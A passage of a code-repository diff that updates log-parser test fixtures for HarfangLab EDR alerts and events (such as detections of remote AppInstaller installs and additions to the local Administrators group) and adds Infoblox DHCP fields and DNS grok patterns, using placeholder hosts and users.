"a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "domain": "DOMAINSI", + "name": "JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json new file mode 100644 index 000000000..3202a7f54 --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_5.json @@ -0,0 +1,90 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new", + "threat_key": "20528" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + }, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_false_positive.json b/HarfangLab/harfanglab/tests/alert_false_positive.json index f01c2921f..99b1994fb 100644 --- a/HarfangLab/harfanglab/tests/alert_false_positive.json +++ b/HarfangLab/harfanglab/tests/alert_false_positive.json @@ -76,7 +76,7 @@ "pc123" ], "user": [ - "XXX\\XXX" + "XXX" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "Discovery: Process list" }, "user": { - "name": "XXX\\XXX" + "domain": "XXX", + "name": "XXX" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/authentication.json b/HarfangLab/harfanglab/tests/authentication.json index 91af4cc19..a00b26310 100644 --- a/HarfangLab/harfanglab/tests/authentication.json +++ b/HarfangLab/harfanglab/tests/authentication.json @@ -58,7 +58,7 @@ "127.0.0.1" ], "user": [ - "test-domain\\work-laptop$" + "work-laptop$" ] }, "sekoiaio": { @@ -78,12 +78,14 @@ "ip": "127.0.0.1" }, "user": { + "domain": "test-domain", "id": "S-1-5-18", - "name": "test-domain\\work-laptop$", + "name": "work-laptop$", "roles": "custom-group", "target": { + "domain": "work-laptop", "id": "S-1-0-0", - "name": "work-laptop\\administrateur" + "name": "administrateur" } } } diff --git a/HarfangLab/harfanglab/tests/authentication_2.json b/HarfangLab/harfanglab/tests/authentication_2.json new file mode 100644 index 000000000..0f5d169e9 --- /dev/null +++ b/HarfangLab/harfanglab/tests/authentication_2.json @@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}" + }, + "expected": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "dataset": "eventlog", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "info", + "start" + ] + }, + "@timestamp": "2024-11-05T11:10:19.543000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "NTLM", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "KeyLength": "128", + "LmPackageName": "NTLM V2", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "NtLmSsp", + "LogonType": "3", + "ProcessId": "0x0", + "SubjectLogonId": "0x0", + "SubjectUserSid": "S-1-0-0", + "TargetDomainName": "EXAMPLE", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0x6accabcc3", + "TargetUserName": "johndoe", + "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111", + "VirtualAccount": "%%1843", + "WorkstationName": "WORKSTATION_NAME" + } + }, + "agent": { + "id": "555555555-9999-9999-9999-3e333333cccc", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [] + }, + "host": { + "domain": "EXAMPLE", + "hostname": "EXAMPLE", + "name": "EXAMPLE", + "os": { + "full": "Windows Server 2022 Datacenter", + "version": "10.0.20348" + } + }, + "log": { + "hostname": "EXAMPLE" + }, + "organization": { + "id": "11111111111111111111" + }, + "related": { + "hosts": [ + "EXAMPLE" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "NtLmSsp" + } + }, + "client": { + "name": "WORKSTATION_NAME", + "os": { + "type": "windows" + } + }, + "server": { + "name": "EXAMPLE", + "os": { + "type": "windows" + } + } + }, + "server": { + "domain": "EXAMPLE" + }, + "user": { + "id": "S-1-0-0", + "target": { + "domain": "EXAMPLE", + "id": "S-1-5-21-11111111111-111111111111-11111111-111", + "name": "johndoe" + } + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/dns.json b/HarfangLab/harfanglab/tests/dns.json index acf1cc407..903c7d68d 100644 --- a/HarfangLab/harfanglab/tests/dns.json +++ b/HarfangLab/harfanglab/tests/dns.json @@ -57,11 +57,12 @@ "work-laptop" ], "user": [ - "test-domain\\john.doe" + "john.doe" ] }, "user": { - "name": "test-domain\\john.doe", + "domain": "test-domain", + "name": "john.doe", "roles": "custom-group" } } diff --git a/HarfangLab/harfanglab/tests/network.json b/HarfangLab/harfanglab/tests/network.json index 0a8eef023..e047efaf0 100644 --- a/HarfangLab/harfanglab/tests/network.json +++ b/HarfangLab/harfanglab/tests/network.json @@ -50,7 +50,7 @@ "192.168.120.41" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "source": { @@ -59,7 +59,8 @@ "port": 21955 }, "user": { - "name": "NT AUTHORITY\\SYSTEM" + "domain": "NT AUTHORITY", + "name": "SYSTEM" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/network2.json b/HarfangLab/harfanglab/tests/network2.json index 43ba71477..b350a10ac 100644 --- a/HarfangLab/harfanglab/tests/network2.json +++ b/HarfangLab/harfanglab/tests/network2.json @@ -51,7 +51,7 @@ "185.202.2.238" ], "user": [ - "NT AUTHORITY\\NETWORK SERVICE" + "NETWORK SERVICE" ] }, "source": { @@ -60,7 +60,8 @@ "port": 42221 }, "user": { - "name": "NT AUTHORITY\\NETWORK SERVICE" + "domain": "NT AUTHORITY", + "name": "NETWORK SERVICE" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process-event.json b/HarfangLab/harfanglab/tests/process-event.json index abbbd338b..9f1f078f3 100644 --- a/HarfangLab/harfanglab/tests/process-event.json +++ b/HarfangLab/harfanglab/tests/process-event.json @@ -81,11 +81,12 @@ "SFRTAOA" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "NT AUTHORITY\\SYSTEM", + "domain": "NT AUTHORITY", + "name": "SYSTEM", "roles": "Group1" } } diff --git a/HarfangLab/harfanglab/tests/process.json b/HarfangLab/harfanglab/tests/process.json index c91f0a2c0..024f674a3 100644 --- a/HarfangLab/harfanglab/tests/process.json +++ b/HarfangLab/harfanglab/tests/process.json @@ -74,11 +74,12 @@ "EXCHANGE" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "NT AUTHORITY\\SYSTEM" + "domain": "NT AUTHORITY", + "name": "SYSTEM" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process2.json b/HarfangLab/harfanglab/tests/process2.json index f01c2921f..99b1994fb 100644 --- a/HarfangLab/harfanglab/tests/process2.json +++ b/HarfangLab/harfanglab/tests/process2.json @@ -76,7 +76,7 @@ "pc123" ], "user": [ - "XXX\\XXX" + "XXX" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "Discovery: Process list" }, "user": { - "name": "XXX\\XXX" + "domain": "XXX", + "name": "XXX" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process3.json b/HarfangLab/harfanglab/tests/process3.json index 035f70d0f..3e464ccab 100644 --- a/HarfangLab/harfanglab/tests/process3.json +++ b/HarfangLab/harfanglab/tests/process3.json @@ -74,11 +74,12 @@ "REDACTED" ], "user": [ - "NT AUTHORITY\\NETWORK SERVICE" + "NETWORK SERVICE" ] }, "user": { - "name": "NT AUTHORITY\\NETWORK SERVICE" + "domain": "NT AUTHORITY", + "name": "NETWORK SERVICE" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process4.json b/HarfangLab/harfanglab/tests/process4.json index a19bf13fc..3f32333c2 100644 --- a/HarfangLab/harfanglab/tests/process4.json +++ b/HarfangLab/harfanglab/tests/process4.json @@ -87,11 +87,12 @@ "jdoe" ], "user": [ - "TST USER\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "TST USER\\SYSTEM", + "domain": "TST USER", + "name": "SYSTEM", "roles": "test_group" } } diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json index 94e83a1fd..ce1d2faa4 100644 --- a/HarfangLab/harfanglab/tests/threat_critical.json +++ b/HarfangLab/harfanglab/tests/threat_critical.json @@ -13,6 +13,9 @@ "name": "harfanglab" }, "harfanglab": { + "agent_ids": [ + "af5e2f63-becd-4660-ade8-30d04c0dd044" + ], "count": { "rules": 1, "users_impacted": 0 diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json index dcab41c28..bed91707b 100644 --- a/HarfangLab/harfanglab/tests/threat_log.json +++ b/HarfangLab/harfanglab/tests/threat_log.json @@ -13,6 +13,10 @@ "name": "harfanglab" }, "harfanglab": { + "agent_ids": [ + "215fe295-905f-4a8d-8347-e9d438d4e415", + "999ba0c7-96b8-4c57-bf0e-63b24813c873" + ], "count": { "rules": 4, "users_impacted": 3 diff --git a/Infoblox/ddi/_meta/fields.yml b/Infoblox/ddi/_meta/fields.yml index 064d69713..947dad6cf 100644 --- a/Infoblox/ddi/_meta/fields.yml +++ b/Infoblox/ddi/_meta/fields.yml @@ -2,3 +2,28 @@ infoblox.ddi.category: description: The logging category of this event. name: infoblox.ddi.category type: keyword + +infoblox.dhcp.circuit_id: + description: The circuit ID. + name: infoblox.dhcp.circuit_id + type: keyword + +infoblox.dhcp.interface_ip: + description: The IP address of the interface. + name: infoblox.dhcp.interface_ip + type: ip + +infoblox.dhcp.lease_time: + description: The lease time. + name: infoblox.dhcp.lease_time + type: keyword + +infoblox.dhcp.router_ip: + description: The IP address of the router. + name: infoblox.dhcp.router_ip + type: ip + +infoblox.dhcp.trans_id: + description: The transaction ID. + name: infoblox.dhcp.trans_id + type: keyword diff --git a/Infoblox/ddi/_meta/smart-descriptions.json b/Infoblox/ddi/_meta/smart-descriptions.json index 32aeb23c0..86ef44018 100644 --- a/Infoblox/ddi/_meta/smart-descriptions.json +++ b/Infoblox/ddi/_meta/smart-descriptions.json @@ -16,5 +16,32 @@ "type": "request resolution of" } ] + }, + { + "value": "{source.ip} perform {event.action}", + "conditions": [ + { + "field": "source.ip" + }, + { + "field": "event.action" + } + ] + }, + { + "value": "Query from {source.ip}", + "conditions": [ + { + "field": "source.ip" + } + ] + }, + { + "value": "Query to {destination.ip}", + "conditions": [ + { + "field": "destination.ip" + } + ] } ] diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 25264fc22..c84be32fe 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -5,7 +5,7 @@ pipeline: name: grok.match properties: output_field: message - pattern: "%{CLIENT}" + pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}|%{DNS_14}" custom_patterns: QUERY_FLAGS: "%{QUERY_FLAGS_RD:flags_rd}%{QUERY_FLAGS_EDNS:flags_edns}?%{QUERY_FLAGS_TCP:flags_tcp}?%{QUERY_FLAGS_DNSSEC:flags_dnssec}?%{QUERY_FLAGS_CD:flags_cd}?%{QUERY_FLAGS_DNS_SERVER_COOKIE}?%{QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER}?" QUERY_FLAGS_RD: '[\+\-]' @@ -16,30 +16,165 @@ pipeline: QUERY_FLAGS_CD: "C" QUERY_FLAGS_DNS_SERVER_COOKIE: "V" QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER: "K" - CLIENT: '(%{WORD:category}: )?client ?(%{DATA}) %{IP:src}#%{INT:spt} (%{DATA}): query: %{IPORHOST:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + CLIENT: "client (?:%{DATA} )?%{IP:client_ip}#%{NUMBER:client_port}:?" + VIEW: "view %{DATA:infoblox_nios_log_view}: " + + # Next patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml + DNS_1: "zone %{DATA:dns_question_name}/%{DATA:dns_question_class}: notify from %{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_2: "transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}' from 